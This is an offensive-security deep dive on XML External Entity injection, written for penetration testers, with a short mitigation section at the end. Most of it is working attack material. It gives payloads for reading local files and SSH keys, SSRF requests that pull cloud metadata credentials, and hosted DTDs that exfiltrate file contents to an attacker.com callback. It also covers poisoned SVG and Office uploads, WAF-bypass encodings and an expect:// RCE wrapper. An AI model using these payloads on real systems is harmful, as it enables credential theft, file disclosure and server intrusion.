XXE — XML External Entity Injection Deep Dive

1. Classic XXE — Local File Read

The classic XXE payload defines an external entity that references a local file path using the file:// protocol. When the XML parser resolves the entity and the application reflects the entity value in its response, the file contents are returned to the attacker.

Technique 01 XXE to read /etc/passwd

POST /api/xml-parse HTTP/1.1
Host: target.com
Content-Type: application/xml
Cookie: session=masaaki_session_token

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInput>
  <username>&xxe;</username>
</userInput>

--- Response ---
HTTP/1.1 200 OK
{
  "error": "Invalid username: root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:..."
}
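
To see the mechanism end to end without a target, here is a local sketch using Python's standard-library SAX parser. That parser resolves external general entities only when the feature_external_ges feature is switched on; it has been off by default since Python 3.7.1. A temporary file stands in for /etc/passwd, and the helper names build_payload and parse_text are illustrative, not taken from any tool.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects every piece of character data the parser reports."""

    def __init__(self) -> None:
        super().__init__()
        self.parts = []

    def characters(self, content: str) -> None:
        self.parts.append(content)


def build_payload(file_uri: str) -> bytes:
    """Classic XXE document: the entity's value lands inside <username>."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY xxe SYSTEM "{file_uri}">\n'
        "]>\n"
        "<userInput><username>&xxe;</username></userInput>\n"
    ).encode("utf-8")


def parse_text(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse with SAX and return all text, as an app that echoes input would."""
    parser = xml.sax.make_parser()
    # True mimics a vulnerable parser; False is Python's safe default.
    parser.setFeature(feature_external_ges, resolve_external)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        fake_passwd = pathlib.Path(tmp, "passwd")
        fake_passwd.write_text("root:x:0:0:root:/root:/bin/bash\n", encoding="utf-8")
        payload = build_payload(fake_passwd.as_uri())
        print("vulnerable:", repr(parse_text(payload, resolve_external=True)))
        print("default:   ", repr(parse_text(payload, resolve_external=False)))
```

With the feature enabled, the file's contents come back as the username text; with the default setting, the entity is silently skipped.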

Other High-Value File Paths

# Linux
file:///etc/passwd
file:///etc/shadow          # Requires root
file:///etc/hosts
file:///etc/nginx/nginx.conf
file:///var/www/html/.env
file:///proc/self/environ   # App environment variables (DB passwords, API keys)
file:///proc/self/cmdline
file:///home/ubuntu/.ssh/id_rsa
file:///home/masaaki/.ssh/authorized_keys
file:///app/config.py
file:///app/settings.py

# Windows
file:///C:/Windows/win.ini
file:///C:/inetpub/wwwroot/web.config
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Users/Administrator/.ssh/id_rsa

2. XXE SSRF — Internal HTTP Requests

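External entities can reference not just file:// but also http:// URLs. The XML parser fetches the URL server-side, which turns XXE into SSRF. Combined with cloud metadata endpoints, this is a critical finding. The metadata requests below work against AWS IMDSv1; IMDSv2 requires a session token obtained with a PUT request, which an entity fetch cannot issue.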

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root><data>&xxe;</data></root>

--- Response contains ---
prod-ec2-role

# Follow up — fetch the credentials:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role">

--- Response contains AWS credentials ---
{
  "AccessKeyId": "ASIA3X...",
  "SecretAccessKey": "wJalrX...",
  "Token": "AQoX..."
}

# Internal service enumeration via XXE-SSRF:
<!ENTITY xxe SYSTEM "http://10.0.0.1:6379/">
# Redis banner: -ERR wrong number of arguments
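
The same vulnerable SAX configuration can be pointed at an HTTP URL to watch the server-side fetch happen. In this sketch a throwaway HTTP server on 127.0.0.1 plays the internal metadata endpoint and answers with the role name from the example above. The handler class, the helper names and the reuse of the metadata path are illustrative assumptions; nothing leaves the local machine.

```python
import io
import threading
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax.handler import ContentHandler, feature_external_ges


class FakeInternalService(BaseHTTPRequestHandler):
    """Stand-in for an internal-only endpoint such as instance metadata."""

    def do_GET(self) -> None:
        self.server.seen_paths.append(self.path)  # record what the parser asked for
        body = b"prod-ec2-role"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args) -> None:
        pass  # silence the default per-request logging


class TextCollector(ContentHandler):
    def __init__(self) -> None:
        super().__init__()
        self.parts = []

    def characters(self, content: str) -> None:
        self.parts.append(content)


def fetch_via_entity(url: str) -> str:
    """Parse an XXE document whose entity points at `url`; return the reflected text."""
    payload = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{url}">]>'
        "<root><data>&xxe;</data></root>"
    ).encode("utf-8")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # deliberately vulnerable setting
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(payload))
    return "".join(collector.parts)


def run_demo():
    server = HTTPServer(("127.0.0.1", 0), FakeInternalService)
    server.seen_paths = []
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        port = server.server_address[1]
        url = f"http://127.0.0.1:{port}/latest/meta-data/iam/security-credentials/"
        return fetch_via_entity(url), list(server.seen_paths)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

The parsed text equals the internal service's response body, and the server log shows the GET that the parser issued on the application's behalf. Python's urllib honours http_proxy/no_proxy environment variables, so a configured proxy can interfere with this local demo.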

3. Blind XXE — Out-of-Band via DNS

When the application parses XML but does not reflect entity values in its response, classic XXE appears to fail. The parser may still resolve entities and make outbound connections, however, so an out-of-band DNS lookup or HTTP request can confirm the vulnerability even when nothing is reflected.

Technique 02 Blind XXE — DNS callback via Burp Collaborator

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://r7k2z9x8.oastify.com/">
]>
<root><data>&xxe;</data></root>

--- Collaborator receives ---
DNS: r7k2z9x8.oastify.com from 54.203.xx.xx
HTTP: GET / HTTP/1.1  Host: r7k2z9x8.oastify.com
      User-Agent: Java/11.0.14

# Confirmed blind XXE — now escalate to data exfiltration
# using external DTD technique (next section)

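The callbacks above confirm that:

The XML parser processes external entities (the DNS lookup alone proves this)
The server, or the DNS resolver it uses, can resolve external hostnames
Outbound HTTP on port 80 is not blocked by the egress firewall (proven only by the HTTP request, not by the DNS lookup)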
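
The blind behaviour can also be reproduced locally before reaching for Burp Collaborator. This sketch assumes a hypothetical endpoint that parses XML with external entities enabled but always returns a fixed message. A small logging HTTP server (an HTTP-only stand-in for Collaborator, with no DNS component) records the request and its User-Agent, which identifies the parser's HTTP client much like the Java/11.0.14 header above.

```python
import io
import threading
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax.handler import ContentHandler, feature_external_ges


class CallbackLogger(BaseHTTPRequestHandler):
    """Records every GET it receives, like an out-of-band interaction log."""

    def do_GET(self) -> None:
        self.server.hits.append((self.path, self.headers.get("User-Agent", "")))
        body = b"ok"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args) -> None:
        pass


def blind_endpoint(xml_bytes: bytes) -> str:
    """Hypothetical app: parses the body but never echoes entity values."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)  # the vulnerable setting
    parser.setContentHandler(ContentHandler())  # base handler ignores all content
    parser.parse(io.BytesIO(xml_bytes))
    return "Request accepted"


def probe():
    listener = HTTPServer(("127.0.0.1", 0), CallbackLogger)
    listener.hits = []
    threading.Thread(target=listener.serve_forever, daemon=True).start()
    try:
        callback = f"http://127.0.0.1:{listener.server_address[1]}/r7k2z9x8"
        payload = (
            '<?xml version="1.0" encoding="UTF-8"?>'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback}">]>'
            "<root><data>&xxe;</data></root>"
        ).encode("utf-8")
        response = blind_endpoint(payload)
        return response, list(listener.hits)
    finally:
        listener.shutdown()
        listener.server_close()


if __name__ == "__main__":
    print(probe())
```

The endpoint's response reveals nothing, while the listener holds one hit whose User-Agent begins with Python-urllib/, which is the same evidence a Collaborator interaction provides.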

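4. Blind XXE — Data Exfiltration via External DTD

Reading a file through a blind XXE channel requires two parameter entities: one that reads the file, and one whose declaration embeds the file's contents in a URL that the parser then fetches. The XML specification forbids parameter entity references inside markup declarations in the internal DTD subset, so the second declaration cannot be built there. An external DTD has no such restriction, which is why the payload is split between a hosted DTD and a small trigger document.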

Technique 03 Blind XXE file exfiltration via external DTD + HTTP callback

Host this DTD file at https://attacker.com/exfil.dtd:

<!-- exfil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!-- &#x25; is an escaped %: a bare % is not allowed inside an entity value -->
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'https://attacker.com/collect?data=%file;'>">
%wrap;
%send;

Then submit this XML to the target:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "https://attacker.com/exfil.dtd">
  %dtd;
]>
<root><data>trigger</data></root>

--- Attacker server receives ---
GET /collect?data=root:x:0:0:root:/root:/bin/bash%0adaemon:x:1:1:... HTTP/1.1
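
The callback arrives URL-encoded. A small helper can turn a logged request line back into the file contents; it assumes the listener logs the raw request line and that the DTD uses the data parameter as above. Note that anything after a literal & or # in the file never reaches the listener, and a literal + in the file is decoded as a space.

```python
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_line: str, param: str = "data") -> str:
    """Recover file contents from a logged line like 'GET /collect?data=... HTTP/1.1'."""
    _method, target, _version = request_line.split(" ", 2)
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if param not in params:
        raise KeyError(f"no {param!r} parameter in {target!r}")
    return params[param][0]  # parse_qs already percent-decodes (%0a -> newline)


if __name__ == "__main__":
    line = "GET /collect?data=root:x:0:0:root:/root:/bin/bash%0adaemon:x:1:1:... HTTP/1.1"
    print(decode_exfil(line))
```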

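Limitation: file contents that contain newlines or URL-significant characters such as &, # or spaces can truncate or break the callback URL, and some HTTP clients reject URLs containing newlines outright. If PHP is the backend, read the file through the php://filter/convert.base64-encode/resource=/etc/passwd wrapper instead, so the exfiltrated value contains only base64 characters.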

PHP Filter Wrapper for Clean Exfiltration

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM 'https://attacker.com/b64?d=%file;'>">
%wrap;
%send;

# Attacker receives clean base64 — decode locally:
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=" | base64 -d
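
When the base64 value travels in a query string, a literal + in it may be decoded as a space by the listener, and some pipelines drop the trailing = padding. A defensive decoder, assuming the d parameter name from the DTD above and a listener that logs raw request lines (decode_b64_exfil is a hypothetical helper):

```python
import base64
from urllib.parse import parse_qsl, urlsplit


def decode_b64_exfil(request_line: str, param: str = "d") -> bytes:
    """Decode php://filter base64 output from a logged 'GET /b64?d=... HTTP/1.1' line."""
    _method, target, _version = request_line.split(" ", 2)
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key == param:
            # parse_qsl turns '+' into ' '; base64 never contains spaces, so undo it.
            value = value.replace(" ", "+")
            # Restore any '=' padding that was stripped along the way.
            value += "=" * (-len(value) % 4)
            return base64.b64decode(value)
    raise KeyError(f"no {param!r} parameter in {target!r}")


if __name__ == "__main__":
    line = "GET /b64?d=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo= HTTP/1.1"
    print(decode_b64_exfil(line).decode())
```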

5. Error-Based XXE

When out-of-band callbacks are blocked or unreliable, error-based XXE is an in-band alternative. The technique triggers an XML parse error whose message contains the file contents, so it only works if the application returns verbose parser errors.

<!-- Host on attacker server: error.dtd -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % error "<!ENTITY &#x25; boom SYSTEM 'file:///nonexistent/%file;'>">
%error;
%boom;

<!-- XXE payload to target: -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "https://attacker.com/error.dtd">
  %dtd;
]>
<root/>

--- Response error message ---
XML parse error: file not found:
/nonexistent/root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

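The file contents appear in the error message itself, so no callback carrying the data is needed. This variant still loads error.dtd from the attacker's server, though, so one outbound request must succeed. Under strict egress filtering, the usual workaround is to reference a DTD file that already exists on the target's filesystem and redefine one of its parameter entities so that it contains the error-triggering declarations.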
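
Verbose errors rarely contain only the leaked data. A hypothetical helper that slices out everything after the bogus /nonexistent/ prefix used in error.dtd; the trailing suffix to strip depends on the parser, so the suffix in the test below is an assumed format to adjust after seeing a real error.

```python
def extract_error_leak(error_text: str, marker: str = "/nonexistent/", suffix: str = "") -> str:
    """Return the file contents embedded after `marker` in a parser error message."""
    start = error_text.find(marker)
    if start == -1:
        raise ValueError("marker not found: errors may not be verbose enough")
    leaked = error_text[start + len(marker):]
    if suffix and leaked.endswith(suffix):
        leaked = leaked[: -len(suffix)]
    return leaked


if __name__ == "__main__":
    message = (
        "XML parse error: file not found:\n"
        "/nonexistent/root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"
    )
    print(extract_error_leak(message))
```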

6. XXE via XInclude

XInclude is an XML specification that allows one XML document to include another. When you do not control the XML document's DOCTYPE declaration (e.g., your input is embedded server-side into a larger XML structure), XInclude lets you inject file reads without a DOCTYPE entity.

Technique 04 XInclude file read — no DOCTYPE needed

POST /api/product/search HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

query=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

--- Response ---
<result>
  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:...
</result>

parse="text" is critical — without it, the included file must be valid XML or parsing fails. Text mode reads arbitrary file content as a character data node.
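
Python's standard library includes an XInclude processor, xml.etree.ElementInclude, which makes the parse="text" versus parse="xml" difference easy to observe locally. Unlike a server-side parser with XInclude switched on (for example Java's DocumentBuilderFactory.setXIncludeAware(true)), it only runs when include() is called, and its default loader treats href as a local path rather than a file:// URL. The helper names and the temporary file standing in for /etc/passwd are illustrative.

```python
import pathlib
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import quoteattr


def xinclude_doc(target: pathlib.Path, parse_mode: str) -> str:
    """Build the injected fragment from the request above, pointing at `target`."""
    return (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f"<xi:include parse={quoteattr(parse_mode)} href={quoteattr(str(target))}/>"
        "</foo>"
    )


def expand(xml_text: str) -> ET.Element:
    """Parse, then resolve xi:include elements in place (default loader reads local files)."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root)
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        target = pathlib.Path(tmp, "passwd")
        target.write_text("root:x:0:0:root:/root:/bin/bash\n", encoding="utf-8")
        print(repr(expand(xinclude_doc(target, "text")).text))
        try:
            expand(xinclude_doc(target, "xml"))
        except ET.ParseError as exc:
            print('parse="xml" failed:', exc)
```

In text mode the file becomes the text of foo; in xml mode the same file is rejected because it is not well-formed XML.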

7. XXE via File Upload

SVG Files

SVG is XML. Any endpoint that accepts SVG uploads and processes them server-side (resizing, converting, validating) is an XXE surface.

<!-- malicious.svg -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <text y="20">&xxe;</text>
</svg>

# Upload via multipart form, then trigger server-side processing
# (e.g., convert to PNG, generate thumbnail, validate dimensions)

DOCX / XLSX (Office Open XML)

Office documents are ZIP archives containing XML files. The main content is in word/document.xml (DOCX) or xl/workbook.xml (XLSX). Unzip, inject XXE, rezip, and upload.

# Unzip the DOCX
unzip original.docx -d docx_dir

# Edit word/document.xml: insert a DOCTYPE right after the XML declaration and reference the entity in a text run:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document ...>
  <w:body>
    <w:p><w:r><w:t>&xxe;</w:t></w:r></w:p>
  </w:body>
</w:document>

# Repack
cd docx_dir && zip -r ../malicious.docx . && cd ..

# Upload to "import document", "parse invoice", or "extract text" feature

OpenDocument Format (ODT)

# content.xml inside ODT ZIP:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE office:document-content [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<office:document-content ...>
  <office:body>
    <office:text>&xxe;</office:text>
  </office:body>
</office:document-content>

8. XXE via XSLT Processing

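XSLT (XSL Transformations) stylesheets are themselves XML. Many XSLT processors resolve external entities and support the document() function, which loads local or remote documents. If an application lets users supply XSLT stylesheets, it is very likely exploitable unless the processor's entity resolution and external document access are explicitly restricted.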

<!-- malicious.xsl -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <output>&xxe;</output>
  </xsl:template>
</xsl:stylesheet>

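<!-- Via the XSLT document() function: no DOCTYPE needed. document() parses its
     target as XML, so it reads XML files (e.g. web.config) cleanly; non-XML files
     such as /etc/passwd usually fail, although the parse error may leak content.
     XSLT 2.0+ processors such as Saxon also offer unparsed-text() for plain text. -->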
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:value-of select="document('file:///etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

<!-- SSRF via XSLT -->
<xsl:value-of select="document('http://169.254.169.254/latest/meta-data/')"/>

9. XXE via Modified Content-Type

REST endpoints that normally accept JSON can sometimes be coerced into parsing XML by changing the Content-Type header. Frameworks that select a body parser from the Content-Type header may have an XML deserializer registered alongside the JSON one, and some fall back to XML parsing when JSON parsing fails.

Technique 05 JSON endpoint accepting XML via Content-Type swap

# Original request:
POST /api/users HTTP/1.1
Content-Type: application/json

{"username": "masaaki", "email": "[email protected]"}

# Modified request — swap Content-Type to XML:
POST /api/users HTTP/1.1
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <username>&xxe;</username>
  <email>[email protected]</email>
</root>

# Also try:
Content-Type: text/xml
Content-Type: application/rss+xml
Content-Type: application/atom+xml
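
Rewriting a JSON body by hand is error-prone once values contain &, < or quotes. A sketch of the conversion, assuming a flat JSON object whose keys are valid XML element names and a root element called root as in the example above; json_to_xxe_xml is a hypothetical helper, and the real endpoint may expect a different root or element layout.

```python
import json
from xml.sax.saxutils import escape


def json_to_xxe_xml(body: str, inject_field: str, system_id: str = "file:///etc/passwd") -> str:
    """Re-express a flat JSON object as XML, replacing one field's value with &xxe;."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("expected a flat JSON object")
    if '"' in system_id:
        raise ValueError("system identifier must not contain double quotes")
    lines = [
        '<?xml version="1.0" encoding="UTF-8"?>',
        "<!DOCTYPE foo [",
        f'  <!ENTITY xxe SYSTEM "{system_id}">',
        "]>",
        "<root>",
    ]
    for key, value in data.items():
        # Escape every other value so the document stays well-formed.
        content = "&xxe;" if key == inject_field else escape(str(value))
        lines.append(f"  <{key}>{content}</{key}>")
    lines.append("</root>")
    return "\n".join(lines)


if __name__ == "__main__":
    print(json_to_xxe_xml('{"username": "masaaki", "email": "user@example.com"}', "username"))
```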

10. XXE Filter Bypass Techniques

WAFs and input filters may block common XXE patterns like SYSTEM, DOCTYPE, or ENTITY. These techniques evade string-matching filters.

Encoding Tricks

# UTF-16 encoding: a byte-matching WAF sees no ASCII "DOCTYPE"/"ENTITY" strings, while the parser decodes the document normally
# Convert payload to UTF-16-LE or UTF-16-BE
Content-Type: application/xml; charset=UTF-16

# Declare encoding in XML declaration:
<?xml version="1.0" encoding="UTF-16"?>

# UTF-7 (older parsers):
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo +AFs-
+ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACIAPg-
+AF0APg-
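
The UTF-16 trick works because a byte-level filter and the parser disagree about what the bytes mean. A sketch with a deliberately harmless document (an internal entity instead of an external one) and a hypothetical naive_waf_blocks() filter that looks for ASCII keywords:

```python
import xml.etree.ElementTree as ET

# Harmless stand-in for a payload: it has a DOCTYPE and ENTITY but reads no files.
DOC = '<?xml version="1.0" encoding="UTF-16"?><!DOCTYPE r [<!ENTITY x "hi">]><r>&x;</r>'

BLOCKLIST = (b"<!DOCTYPE", b"<!ENTITY", b"SYSTEM")


def naive_waf_blocks(raw_body: bytes) -> bool:
    """Hypothetical filter that matches ASCII keywords in the raw request body."""
    return any(token in raw_body for token in BLOCKLIST)


if __name__ == "__main__":
    single_byte_body = DOC.encode("utf-8")  # same text as 1-byte chars (filter only)
    utf16_body = DOC.encode("utf-16")  # BOM, then two bytes per character
    print(naive_waf_blocks(single_byte_body), naive_waf_blocks(utf16_body))
    print(ET.fromstring(utf16_body).text)  # the parser still expands the entity
```

The filter flags the single-byte version but not the UTF-16 one, while the parser reads the UTF-16 bytes without complaint.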

Parameter Entity Indirection

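# When a filter matches the literal file path, split the string across parameter entities
# (this still uses the ENTITY keyword, so it does not help if ENTITY itself is blocked):
<!DOCTYPE foo [
  <!ENTITY % a "fil">
  <!ENTITY % b "e:">
  <!ENTITY % c "///etc/passwd">
  <!ENTITY % xxe SYSTEM "file:///etc/passwd">
]>

# Concatenation only works where parameter entity references may appear inside
# declarations, i.e. in an external DTD (the internal subset forbids this):
<!ENTITY % path "%a;%b;%c;">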

Protocol Alternatives

# PHP-specific wrappers (bypass file:// filter)
php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
expect://id   # PHP expect:// wrapper: RCE if the PECL expect extension is installed

# Java jar: protocol: reads entries inside a local or remote ZIP/JAR (remote archives are downloaded to a temp file first)
jar:file:///var/www/app/webapp.jar!/
jar:http://attacker.com/evil.jar!/

# netdoc:// (older Java)
netdoc:///etc/passwd

Bypassing Blocked DOCTYPE

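# If DOCTYPE is WAF-blocked, try variants that a lenient parser or an extra decoding layer may still accept
# (XML keywords are case-sensitive, so strict parsers reject the first two):
<!doctype          # lowercase
<!D&#x4F;CTYPE     # character reference for O
<!DO%43TYPE        # URL-encoding (if double-decoded)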

# Whitespace injection — some WAFs tokenize on space:
<!DOCTYPE
foo
[<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

11. Prevention & Mitigations

Disable external entity processing

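The primary fix is to disable DTD processing and external entity resolution in the XML parser. In Java (Xerces-based DocumentBuilderFactory or SAXParserFactory): factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true). In Python lxml: create the parser with resolve_entities=False. In PHP: libxml_disable_entity_loader(true) on PHP 7 and earlier; the function is deprecated as of PHP 8.0 because libxml2 2.9+ does not load external entities by default, so avoid passing LIBXML_NOENT or LIBXML_DTDLOAD when parsing untrusted input.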
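
Python's standard library has no single disallow-doctype-decl switch, but the same policy can be approximated with a pre-check. A minimal sketch, assuming untrusted input arrives as bytes: an expat pass raises as soon as it sees a DOCTYPE, before any entity is declared or expanded, and only then is the document handed to ElementTree. ElementTree on its own already refuses to fetch external entities (it raises ParseError), but it does expand internal ones, which the DOCTYPE ban also stops. The third-party defusedxml package offers a maintained version of this kind of guard.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML carries any DOCTYPE declaration."""


def parse_untrusted(data: bytes) -> ET.Element:
    """Reject documents with a DOCTYPE, then parse the rest with ElementTree."""
    checker = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Stops parsing before any entity is declared, fetched, or expanded.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    checker.StartDoctypeDeclHandler = on_doctype
    checker.Parse(data, True)  # also raises expat.ExpatError on malformed input
    return ET.fromstring(data)


if __name__ == "__main__":
    print(parse_untrusted(b"<r><a>1</a></r>").find("a").text)
```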

Use safe parser configurations

For Java JAXP parsers, enable XMLConstants.FEATURE_SECURE_PROCESSING and set the XMLConstants.ACCESS_EXTERNAL_DTD and XMLConstants.ACCESS_EXTERNAL_SCHEMA properties to empty strings. For .NET, use XmlReaderSettings with DtdProcessing = DtdProcessing.Prohibit and set XmlResolver to null.

Prefer JSON or protocol buffers

Where XML is not a hard requirement, switch to JSON or protobuf. JSON parsers have no concept of external entities. Removing the XML attack surface entirely is the most reliable mitigation.

Validate and sandbox file uploads

Process uploaded Office/SVG files in an isolated sandbox with no network access and no filesystem read privileges outside a designated directory. Use a dedicated microservice with a stripped-down container that has no credentials or sensitive files accessible.
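
As a first gate in front of that sandbox, an upload handler can refuse SVG, OOXML and ODF files whose XML parts declare a DOCTYPE. Office documents do not normally carry one, though some SVG exporters emit a public SVG DOCTYPE, so decide whether to reject or strip in that case. A sketch using only the standard library: upload_is_suspicious is a hypothetical name, it only inspects archive members ending in .xml, .rels or .svg, and it does not defend against ZIP bombs, so keep size limits and the sandbox in place. Running each part through expat rather than a byte search means UTF-16 encoded parts are still caught.

```python
import io
import zipfile
from xml.parsers import expat

XML_PART_SUFFIXES = (".xml", ".rels", ".svg")


class _DoctypeFound(Exception):
    """Internal signal used to stop parsing at the first DOCTYPE."""


def declares_doctype(xml_bytes: bytes) -> bool:
    """True if the document declares a DOCTYPE; raises expat.ExpatError if malformed."""
    parser = expat.ParserCreate()  # expat detects UTF-8/UTF-16 from the bytes

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise _DoctypeFound(name)

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except _DoctypeFound:
        return True
    return False


def upload_is_suspicious(data: bytes, filename: str) -> bool:
    """Hypothetical upload gate for SVG and ZIP-based office formats."""
    try:
        if zipfile.is_zipfile(io.BytesIO(data)):
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                for info in archive.infolist():
                    if info.filename.lower().endswith(XML_PART_SUFFIXES):
                        if declares_doctype(archive.read(info)):
                            return True
            return False
        if filename.lower().endswith(".svg"):
            return declares_doctype(data)
        return False
    except expat.ExpatError:
        return True  # malformed XML: reject rather than guess what a parser would do
```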

Network egress filtering

Even when XXE is present, restricting outbound network access prevents out-of-band data exfiltration. Ensure application servers cannot make arbitrary outbound HTTP/DNS requests. This limits blind XXE to error-based techniques, which need verbose errors and, without an attacker-hosted DTD, a usable DTD file already present on the server.

Audit all Content-Type paths

Ensure REST endpoints reject unexpected Content-Types. Return HTTP 415 Unsupported Media Type for application/xml if only JSON is intended. Configure frameworks to not fall back to XML parsing when the declared type is application/json.
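
In a framework the 415 behaviour is usually a routing or body-parser setting; stripped down to plain WSGI it looks like the sketch below. json_only_app and call_app are hypothetical names, and the check compares only the media type, ignoring parameters such as charset.

```python
import io
import json
from wsgiref.util import setup_testing_defaults


def json_only_app(environ, start_response):
    """Hypothetical JSON-only endpoint: the body never reaches an XML parser."""
    media_type = environ.get("CONTENT_TYPE", "").split(";", 1)[0].strip().lower()
    if environ["REQUEST_METHOD"] in ("POST", "PUT", "PATCH") and media_type != "application/json":
        start_response("415 Unsupported Media Type", [("Content-Type", "text/plain")])
        return [b"Only application/json is accepted\n"]
    length = int(environ.get("CONTENT_LENGTH") or 0)
    try:
        json.loads(environ["wsgi.input"].read(length) or b"{}")
    except ValueError:  # includes JSONDecodeError and UnicodeDecodeError
        start_response("400 Bad Request", [("Content-Type", "text/plain")])
        return [b"Malformed JSON\n"]
    start_response("200 OK", [("Content-Type", "application/json")])
    return [b'{"ok": true}']


def call_app(content_type: str, body: bytes):
    """Drive the app in-process with a minimal WSGI environ (for illustration)."""
    environ = {}
    setup_testing_defaults(environ)
    environ.update({
        "REQUEST_METHOD": "POST",
        "CONTENT_TYPE": content_type,
        "CONTENT_LENGTH": str(len(body)),
        "wsgi.input": io.BytesIO(body),
    })
    status = []
    chunks = json_only_app(environ, lambda s, headers: status.append(s))
    return status[0], b"".join(chunks)


if __name__ == "__main__":
    print(call_app("application/xml", b"<root/>"))
```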

Testing checklist: Test every XML-accepting endpoint (SOAP, REST with XML content-type, file upload). Try swapping Content-Type from JSON to XML on JSON endpoints. Test all document upload features (SVG, DOCX, XLSX, ODT, PPTX). Try XInclude when DOCTYPE is blocked. Always use a Collaborator/interactsh host to detect blind XXE before attempting file reads.
